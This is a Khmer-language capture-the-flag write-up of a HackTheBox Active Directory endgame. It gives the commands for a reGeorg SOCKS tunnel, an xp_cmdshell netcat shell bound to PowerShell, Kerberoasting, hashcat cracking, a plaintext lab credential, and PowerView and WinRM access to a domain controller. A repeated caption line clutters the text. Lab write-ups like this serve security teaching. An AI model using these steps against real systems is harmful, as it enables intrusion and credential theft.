αž”αŸ‰αž»αž“αŸ’αžαŸ‚αž“αŸ…αž–αŸαž›αžŠαŸ‚αž›αž™αžΎαž„αž–αŸ’αž™αžΆαž™αžΆαž˜αž…αžΌαž›αž”αŸ’αžšαžΎαžœαžΆ αž™αžΎαž„αž‘αž‘αž½αž›αž”αžΆαž“αž€αŸ†αž αž»αžŸ 404 αŸ” αž“αŸαŸ‡αž˜αžΆαž“αž“αŸαž™αžαžΆαž―αž€αžŸαžΆαžš *.aspx αž˜αž·αž“αžαŸ’αžšαžΌαžœαž”αžΆαž“αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž‘αŸαŸ” αžŠαžΎαž˜αŸ’αž”αžΈαž’αŸ’αžœαžΎαž±αŸ’αž™αž―αž€αžŸαžΆαžšαžŠαŸ‚αž›αž˜αžΆαž“αž•αŸ’αž“αŸ‚αž€αž”αž“αŸ’αžαŸ‚αž˜αž‘αžΆαŸ†αž„αž“αŸαŸ‡αžŠαŸ†αžŽαžΎαžšαž€αžΆαžš αžŸαžΌαž˜αžŠαŸ†αž‘αžΎαž„ ASP.NET 4.5 αžŠαžΌαž…αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ”

dism /online /enable-feature /all /featurename:IIS-ASPNET45

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž αžΎαž™αž₯αž‘αžΌαžœαž“αŸαŸ‡ αž“αŸ…αž–αŸαž›αž…αžΌαž›αž”αŸ’αžšαžΎ tunnel.aspx αž™αžΎαž„αž‘αž‘αž½αž›αž”αžΆαž“αž…αž˜αŸ’αž›αžΎαž™αžαžΆαž’αŸ’αžœαžΈαŸ—αžšαž½αž…αžšαžΆαž›αŸ‹αžŠαžΎαž˜αŸ’αž”αžΈαžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž αžΎαž™αŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αžαŸ„αŸ‡αž…αžΆαž”αŸ‹αž•αŸ’αžαžΎαž˜αž•αŸ’αž“αŸ‚αž€αž’αžαž·αžαž·αž‡αž“αž“αŸƒαž€αž˜αŸ’αž˜αžœαž·αž’αžΈ αžŠαŸ‚αž›αž“αžΉαž„αž”αž‰αŸ’αž‡αžΌαž“αž…αžšαžΆαž…αžšαŸ” αž™αžΎαž„αž“αžΉαž„αž”αž‰αŸ’αž‡αžΌαž“αž…αžšαžΆαž…αžšαžŽαŸαž‘αžΆαŸ†αž„αž’αžŸαŸ‹αž–αžΈαž…αŸ’αžšαž€ 5432 αž‘αŸ…αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž˜αŸαŸ”

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž αžΎαž™αž™αžΎαž„αž”αŸ’αžšαžΎ proxychains αžŠαžΎαž˜αŸ’αž”αžΈαž•αŸ’αž‰αžΎαž…αžšαžΆαž…αžšαž“αŸƒαž€αž˜αŸ’αž˜αžœαž·αž’αžΈαžŽαžΆαž˜αž½αž™αžαžΆαž˜αžšαž™αŸˆαž”αŸ’αžšαžΌαž€αžŸαŸŠαžΈαžšαž”αžŸαŸ‹αž™αžΎαž„αŸ” αžαŸ„αŸ‡αž”αž“αŸ’αžαŸ‚αž˜αž”αŸ’αžšαžΌαž€αžŸαŸŠαžΈαž“αŸαŸ‡αž‘αŸ…αž―αž€αžŸαžΆαžšαž€αŸ†αžŽαžαŸ‹αžšαž…αž“αžΆαžŸαž˜αŸ’αž–αŸαž“αŸ’αž’ /etc/proxychains.conf αŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž₯αž‘αžΌαžœβ€‹αž™αžΎαž„β€‹αž”αž„αŸ’αž αŸ„αŸ‡β€‹αž€αž˜αŸ’αž˜αžœαž·αž’αžΈβ€‹αž‘αŸ…β€‹αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“β€‹αž˜αŸ αžŽαŸαžαžαŸαžαž‡αžΆαž˜αž½αž™αž“αžΉαž„αž€αžΆαžšαžŠαŸ‚αž›αž™αžΎαž„αž“αžΉαž„αž’αŸ’αžœαžΎαž±αŸ’αž™αžŸαŸ‚αž›αž…αž„αž˜αžΆαž“αžŸαŸ’αžαŸαžšαž—αžΆαž–αž“αž·αž„αžŸαŸ’αž‚αŸ’αžšαžΈαž” αž αŸ… KerberoastαžŠαŸ‚αž›αž™αžΎαž„αž“αžΉαž„αž’αŸ’αžœαžΎαž€αžΆαžšαžœαžΆαž™αž”αŸ’αžšαž αžΆαžš Kerberoasting αŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž₯αž‘αžΌαžœαž“αŸαŸ‡ αžαžΆαž˜αžšαž™αŸˆ MSSQL αž™αžΎαž„αž”αžΎαž€αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž€αž˜αŸ’αž˜αžœαž·αž’αžΈαžŸαŸ’αžαžΆαž”αŸ‹αŸ”

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž αžΎαž™αž™αžΎαž„αž—αŸ’αž‡αžΆαž”αŸ‹αžαžΆαž˜αžšαž™αŸˆαž”αŸ’αžšαžΌαž€αžŸαŸŠαžΈαžšαž”αžŸαŸ‹αž™αžΎαž„αŸ”

proxychains rlwrap nc poo.htb 4321

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž αžΎαž™β€‹αž™αžΎαž„β€‹αž‘αž‘αž½αž›β€‹αž”αžΆαž“β€‹αžŸαž‰αŸ’αž‰αžΆαŸ”

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž”αž“αŸ’αž‘αžΆαž”αŸ‹ αž’αŸ’αž“αž€αžαŸ’αžšαžΌαžœαž’αŸ’αžœαžΎαž˜αŸ’αžαž„αž‘αŸ€αžαž›αžΎαžŸαž‰αŸ’αž‰αžΆαž‘αžΆαŸ†αž„αž“αŸαŸ‡αŸ” αžŠαŸ„αž™αžŸαžΆαžš Rockyou αž˜αž·αž“αž˜αžΆαž“αžœαž…αž“αžΆαž“αž»αž€αŸ’αžšαž˜αž‘αž·αž“αŸ’αž“αž“αŸαž™αž–αžΆαž€αŸ’αž™αžŸαž˜αŸ’αž„αžΆαžαŸ‹ αžαŸ’αž‰αž»αŸ†αž”αžΆαž“αž”αŸ’αžšαžΎαžœαž…αž“αžΆαž“αž»αž€αŸ’αžšαž˜αž–αžΆαž€αŸ’αž™αžŸαž˜αŸ’αž„αžΆαžαŸ‹αž‘αžΆαŸ†αž„αž’αžŸαŸ‹αžŠαŸ‚αž›αž˜αžΆαž“αž“αŸ…αž€αŸ’αž“αž»αž„ Seclists αŸ” αžŸαž˜αŸ’αžšαžΆαž”αŸ‹αž€αžΆαžšαž‚αžŽαž“αžΆαž™αžΎαž„αž”αŸ’αžšαžΎ hashcat αŸ”

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

αž αžΎαž™αž™αžΎαž„αžšαž€αžƒαžΎαž‰αž–αžΆαž€αŸ’αž™αžŸαž˜αŸ’αž„αžΆαžαŸ‹αž‘αžΆαŸ†αž„αž–αžΈαžš αž‘αžΈαž˜αž½αž™αž“αŸ…αž€αŸ’αž“αž»αž„αžœαž…αž“αžΆαž“αž»αž€αŸ’αžšαž˜ dutch_passwordlist.txt αž“αž·αž„αž‘αžΈαž–αžΈαžšαž“αŸ…αž€αŸ’αž“αž»αž„ Keyboard-Combinations.txtαŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αžŠαžΌαž…αŸ’αž“αŸαŸ‡αž αžΎαž™ αž™αžΎαž„αž˜αžΆαž“αž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž”αžΈαž“αžΆαž€αŸ‹ αž™αžΎαž„αž‘αŸ… domain controllerαŸ” αž…αžΌαžšβ€‹αžŸαŸ’αžœαŸ‚αž„β€‹αžšαž€β€‹αž’αžΆαžŸαž™αžŠαŸ’αž‹αžΆαž“β€‹αžšαž”αžŸαŸ‹β€‹αž‚αžΆαžαŸ‹β€‹αž‡αžΆβ€‹αž˜αž»αž“β€‹αžŸαž·αž“αŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž›αŸ’αž’αžŽαžΆαžŸαŸ‹ αž™αžΎαž„αž”αžΆαž“αžšαŸ€αž“αž’αžΆαžŸαž™αžŠαŸ’αž‹αžΆαž“ IP αžšαž”αžŸαŸ‹αž§αž”αž€αžšαžŽαŸαž”αž‰αŸ’αž‡αžΆαžŠαŸ‚αž“αŸ” αž…αžΌαžšαž™αžΎαž„αžŸαŸ’αžœαŸ‚αž„αž™αž›αŸ‹αž–αžΈαž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž‘αžΆαŸ†αž„αž’αžŸαŸ‹αž“αŸƒαžŠαŸ‚αž“ αž€αŸαžŠαžΌαž…αž‡αžΆαžαžΆαžαžΎαž–αž½αž€αž‚αŸαž˜αž½αž™αžŽαžΆαž‡αžΆαž’αŸ’αž“αž€αž‚αŸ’αžšαž”αŸ‹αž‚αŸ’αžšαž„αŸ” αžŠαžΎαž˜αŸ’αž”αžΈαž‘αžΆαž‰αž™αž€αžŸαŸ’αž‚αŸ’αžšαžΈαž”αžŠαžΎαž˜αŸ’αž”αžΈαž‘αž‘αž½αž›αž”αžΆαž“αž–αŸαžαŸŒαž˜αžΆαž“ PowerView.ps1 αŸ” αž”αž“αŸ’αž‘αžΆαž”αŸ‹αž˜αž€αž™αžΎαž„αž“αžΉαž„αž—αŸ’αž‡αžΆαž”αŸ‹αžŠαŸ„αž™αž”αŸ’αžšαžΎ evil-winrm αžŠαŸ„αž™αž”αž‰αŸ’αž‡αžΆαž€αŸ‹αžαžαž‡αžΆαž˜αž½αž™αžŸαŸ’αž‚αŸ’αžšαžΈαž”αž€αŸ’αž“αž»αž„αž”αŸ‰αžΆαžšαŸ‰αžΆαž˜αŸ‰αŸ‚αžαŸ’αžš -s αŸ” αž αžΎαž™αž”αž“αŸ’αž‘αžΆαž”αŸ‹αž˜αž€αž‚αŸ’αžšαžΆαž“αŸ‹αžαŸ‚αž•αŸ’αž‘αž»αž€αžŸαŸ’αž‚αŸ’αžšαžΈαž” PowerView αŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž₯αž‘αžΌαžœαž“αŸαŸ‡ αž™αžΎαž„αž˜αžΆαž“αžŸαž·αž‘αŸ’αž’αž·αž…αžΌαž›αž”αŸ’αžšαžΎαž˜αž»αžαž„αžΆαžšαž‘αžΆαŸ†αž„αž’αžŸαŸ‹αžšαž”αžŸαŸ‹αžœαžΆαŸ” αž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹ p00_adm αž˜αžΎαž›αž‘αŸ…αžŠαžΌαž…αž‡αžΆαž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αžŠαŸ‚αž›αž˜αžΆαž“αžŸαž·αž‘αŸ’αž’αž· αžŠαžΌαž…αŸ’αž“αŸαŸ‡αž™αžΎαž„αž“αžΉαž„αž’αŸ’αžœαžΎαž€αžΆαžšαž€αŸ’αž“αž»αž„αž”αžšαž·αž”αž‘αžšαž”αžŸαŸ‹αžœαžΆαŸ” αžαŸ„αŸ‡αž”αž„αŸ’αž€αžΎαžαžœαžαŸ’αžαž» PSCredential αžŸαž˜αŸ’αžšαžΆαž”αŸ‹αž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž“αŸαŸ‡αŸ”

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

αž₯αž‘αžΌαžœαž“αŸαŸ‡αž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆ Powershell αž‘αžΆαŸ†αž„αž’αžŸαŸ‹αžŠαŸ‚αž›αž™αžΎαž„αž”αž‰αŸ’αž‡αžΆαž€αŸ‹ Creds αž“αžΉαž„αžαŸ’αžšαžΌαžœαž”αžΆαž“αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αŸ’αž“αž»αž„αž“αžΆαž˜ p00_adm αŸ” αž…αžΌαžšαž”αž„αŸ’αž αžΆαž‰αž”αž‰αŸ’αž‡αžΈαž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹ αž“αž·αž„αž‚αž»αžŽαž›αž€αŸ’αžαžŽαŸˆ AdminCount αŸ”

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αžŠαžΌαž…αŸ’αž“αŸαŸ‡αž αžΎαž™ αž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αžšαž”αžŸαŸ‹αž™αžΎαž„αž–αž·αžαž‡αžΆαž˜αžΆαž“αžŸαž·αž‘αŸ’αž’αž·αŸ” αž…αžΆαŸ†αž˜αžΎαž›αžαžΆαž‚αžΆαžαŸ‹αž‡αžΆαž€αŸ’αžšαž»αž˜αžŽαžΆαžαŸ’αž›αŸ‡?

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž‘αžΈαž”αŸ†αž•αž»αžαž™αžΎαž„αž”αž‰αŸ’αž‡αžΆαž€αŸ‹αžαžΆαž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž‚αžΊαž‡αžΆαž’αŸ’αž“αž€αž‚αŸ’αžšαž”αŸ‹αž‚αŸ’αžšαž„αžŠαŸ‚αž“αŸ” αžœαžΆαž•αŸ’αžαž›αŸ‹αž±αŸ’αž™αžœαžΆαž“αžΌαžœαžŸαž·αž‘αŸ’αž’αž·αž€αŸ’αž“αž»αž„αž€αžΆαžšαž…αžΌαž›αž‘αŸ…αž€αžΆαž“αŸ‹αž§αž”αž€αžšαžŽαŸαž”αž‰αŸ’αž‡αžΆαžŠαŸ‚αž“αž–αžΈαž…αž˜αŸ’αž„αžΆαž™αŸ” αžαŸ„αŸ‡αž–αŸ’αž™αžΆαž™αžΆαž˜αž…αžΌαž›αž‡αžΆαž˜αž½αž™ WinRM αžŠαŸ„αž™αž”αŸ’αžšαžΎαž•αŸ’αž›αžΌαžœαžšαžΌαž„αž€αŸ’αžšαŸ„αž˜αžŠαžΈαžšαž”αžŸαŸ‹αž™αžΎαž„αŸ” αžαŸ’αž‰αž»αŸ†αž˜αžΆαž“αž€αžΆαžšαž—αŸαž“αŸ’αžαž…αŸ’αžšαž‘αŸ†αžŠαŸ„αž™αž€αŸ†αž αž»αžŸαžŠαŸ‚αž›αž…αŸαž‰αžŠαŸ„αž™ reGeorg αž“αŸ…αž–αŸαž›αž”αŸ’αžšαžΎ evil-winrm αŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž”αž“αŸ’αž‘αžΆαž”αŸ‹αž˜αž€αž™αžΎαž„αž”αŸ’αžšαžΎαž˜αž½αž™αž‘αŸ€αž αž„αžΆαž™αžŸαŸ’αžšαž½αž›αž‡αžΆαž„αŸ” αžŸαŸ’αž‚αŸ’αžšαžΈαž” αžŠαžΎαž˜αŸ’αž”αžΈαž—αŸ’αž‡αžΆαž”αŸ‹αž‘αŸ… WinRM αŸ” αž”αžΎαž€αž“αž·αž„αž•αŸ’αž›αžΆαžŸαŸ‹αž”αŸ’αžαžΌαžšαž”αŸ‰αžΆαžšαŸ‰αžΆαž˜αŸ‰αŸ‚αžαŸ’αžšαž“αŸƒαž€αžΆαžšαžαž—αŸ’αž‡αžΆαž”αŸ‹αŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž™αžΎαž„αž–αŸ’αž™αžΆαž™αžΆαž˜αž—αŸ’αž‡αžΆαž”αŸ‹ αž αžΎαž™αž™αžΎαž„αžŸαŸ’αžαž·αžαž“αŸ…αž€αŸ’αž“αž»αž„αž”αŸ’αžšαž–αŸαž“αŸ’αž’αŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž”αŸ‰αž»αž“αŸ’αžαŸ‚αž˜αž·αž“αž˜αžΆαž“αž‘αž„αŸ‹αž‡αžΆαžαž·αž‘αŸαŸ” αž”αž“αŸ’αž‘αžΆαž”αŸ‹αž˜αž€αž˜αžΎαž›αž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹ αž αžΎαž™αž–αž·αž“αž·αžαŸ’αž™αž˜αžΎαž›αž•αŸ’αž‘αŸƒαžαž»αŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž“αŸ… mr3ks αž™αžΎαž„αžšαž€αžƒαžΎαž‰αž‘αž„αŸ‹αž αžΎαž™αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸαžαŸ’αžšαžΌαžœαž”αžΆαž“αž”αž‰αŸ’αž…αž”αŸ‹ 100% αŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž’αžŸαŸ‹αž αžΎαž™αŸ” αž‡αžΆαž˜αžαž·αž€αŸ‚αž›αž˜αŸ’αž’ αžŸαžΌαž˜αž•αŸ’αžαž›αŸ‹αž˜αžαž·αž›αžΎαžαžΆαžαžΎαž’αŸ’αž“αž€αž”αžΆαž“αžšαŸ€αž“αž’αŸ’αžœαžΈαžαŸ’αž˜αžΈαž–αžΈαž’αžαŸ’αžαž”αž‘αž“αŸαŸ‡ αž“αž·αž„αžαžΆαžαžΎαžœαžΆαž˜αžΆαž“αž”αŸ’αžšαž™αŸ„αž‡αž“αŸαžŸαž˜αŸ’αžšαžΆαž”αŸ‹αž’αŸ’αž“αž€αžŠαŸ‚αžšαž¬αž‘αŸαŸ”

αž’αŸ’αž“αž€αž’αžΆαž…αž…αžΌαž›αžšαž½αž˜αž‡αžΆαž˜αž½αž™αž–αž½αž€αž™αžΎαž„αž“αŸ… Telegram. αž“αŸ…αž‘αžΈαž“αŸ„αŸ‡αž’αŸ’αž“αž€αž’αžΆαž…αžŸαŸ’αžœαŸ‚αž„αžšαž€αžŸαž˜αŸ’αž—αžΆαžšαŸˆαžŠαŸ‚αž›αž‚αž½αžšαž±αŸ’αž™αž…αžΆαž”αŸ‹αž’αžΆαžšαž˜αŸ’αž˜αžŽαŸ αžœαž‚αŸ’αž‚αžŸαž·αž€αŸ’αžŸαžΆαžšαž½αž˜αž”αž‰αŸ’αž…αžΌαž›αž‚αŸ’αž“αžΆ αž€αŸαžŠαžΌαž…αž‡αžΆαž€αž˜αŸ’αž˜αžœαž·αž’αžΈαŸ” αž…αžΌαžšαž”αŸ’αžšαž˜αžΌαž›αž•αŸ’αžαž»αŸ†αžŸαž αž‚αž˜αž“αŸαž˜αž½αž™αžŠαŸ‚αž›αž“αžΉαž„αž˜αžΆαž“αž˜αž“αž»αžŸαŸ’αžŸαžŠαŸ‚αž›αž™αž›αŸ‹αž–αžΈαž•αŸ’αž“αŸ‚αž€αž‡αžΆαž…αŸ’αžšαžΎαž“αž“αŸƒ IT αž”αž“αŸ’αž‘αžΆαž”αŸ‹αž˜αž€αž™αžΎαž„αžαŸ‚αž„αžαŸ‚αž’αžΆαž…αž‡αž½αž™αž‚αŸ’αž“αžΆαž‘αŸ…αžœαž·αž‰αž‘αŸ…αž˜αž€αž›αžΎαž”αž‰αŸ’αž αžΆ IT αž“αž·αž„αžŸαž“αŸ’αžαž·αžŸαž»αžαž–αŸαžαŸŒαž˜αžΆαž“αŸ”

αž”αŸ’αžšαž—αž–: www.habr.com

αž”αž“αŸ’αžαŸ‚αž˜αž˜αžαž·αž™αŸ„αž”αž›αŸ‹